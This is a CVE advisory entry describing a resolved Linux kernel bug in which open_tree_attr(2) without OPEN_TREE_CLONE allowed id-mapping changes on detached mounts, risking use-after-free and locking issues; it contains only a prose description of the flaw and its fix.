CVE-2025-39717

In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> open_tree_attr: do not allow id-mapping changes without OPEN_TREE_CLONE<br /> <br /> As described in commit 7a54947e727b (&amp;#39;Merge patch series "fs: allow<br /> changing idmappings"&amp;#39;), open_tree_attr(2) was necessary in order to<br /> allow for a detached mount to be created and have its idmappings changed<br /> without the risk of any racing threads operating on it. For this reason,<br /> mount_setattr(2) still does not allow for id-mappings to be changed.<br /> <br /> However, there was a bug in commit 2462651ffa76 ("fs: allow changing<br /> idmappings") which allowed users to bypass this restriction by calling<br /> open_tree_attr(2) *without* OPEN_TREE_CLONE.<br /> <br /> can_idmap_mount() prevented this bug from allowing an attached<br /> mountpoint&amp;#39;s id-mapping from being modified (thanks to an is_anon_ns()<br /> check), but this still allows for detached (but visible) mounts to have<br /> their be id-mapping changed. This risks the same UAF and locking issues<br /> as described in the merge commit, and was likely unintentional.